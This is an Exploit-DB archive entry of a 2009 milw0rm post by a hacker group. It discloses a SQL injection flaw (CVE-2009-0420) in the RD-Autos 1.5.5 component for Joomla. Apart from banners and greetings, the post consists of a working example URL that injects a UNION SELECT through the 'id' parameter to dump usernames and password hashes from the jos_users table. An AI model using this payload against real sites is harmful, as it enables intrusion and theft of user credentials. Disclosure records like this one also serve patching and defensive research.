Joomla Component RD-Autos 1.5.5 id SQL Injection Vulnerability

2009-01-15T00:00:00
ID EDB-ID:7795
Type exploitdb
Reporter H!tm@N
Modified 2009-01-15T00:00:00

Description

Joomla Component RD-Autos 1.5.5 (id) SQL Injection Vulnerability. CVE-2009-0420. Webapps exploit for php platform

                                        
                                            #############################################################################
#							                    #
#           Joomla Component RDAutos SQL Injection Vulnerability            #
#							                    #
#############################################################################


########################################

[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de 
[~]         -=[Kosova Hackers Group]=--=[KHG-Crew]=-

########################################

[~] ScriptName:     "Joomla"
[~] Component:      "RDAutos (com_rdautos)"
[~] Version:        "1.5.5 Stable" 
[~] Date:           "29/09/2008"
[~] Author:         "Robert Dam"
[~] Author E-mail:  "info@rd-media.org"
[~] Author URL:     "www.rd-media.org"

########################################

[~] Exploit /index.php?option=com_rdautos&view=category&id=[SQL]&Itemid=54
[~] Example /index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54

########################################

[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] United States of Albania

########################################

# milw0rm.com [2009-01-15]